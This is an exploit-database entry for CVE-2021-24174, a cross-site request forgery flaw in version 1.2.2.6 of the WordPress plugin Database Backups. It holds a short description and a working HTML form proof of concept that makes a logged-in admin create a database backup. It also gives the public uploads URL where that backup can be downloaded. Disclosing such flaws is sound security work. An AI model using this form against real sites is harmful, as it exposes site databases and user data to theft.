Share
## https://sploitus.com/exploit?id=PACKETSTORM:163091
# Exploit Title: WordPress Plugin Database Backups 1.2.2.6 - 'Database Backup Download' CSRF  
# Date: 2/10/2021  
# Author: 0xB9  
# Software Link: https://wordpress.org/plugins/database-backups/  
# Version: 1.2.2.6  
# Tested on: Windows 10  
# CVE: CVE-2021-24174  
  
1. Description:  
This plugin allows admins to create and download database backups. A CSRF can create DB backups stored publicly in the uploads directory.  
  
2. Proof of Concept:  
  
<form action="http://localhost/wp-admin/tools.php?page=database-backups" method="post">  
<input type="hidden" name="do_backup_manually" value="1">  
<input type="submit" class="button button-primary" value="Do backup" autocomplete="off">   
</form>  
  
Backups can be accessed by the following URL.  
http://localhost/wp-content/uploads/database-backups/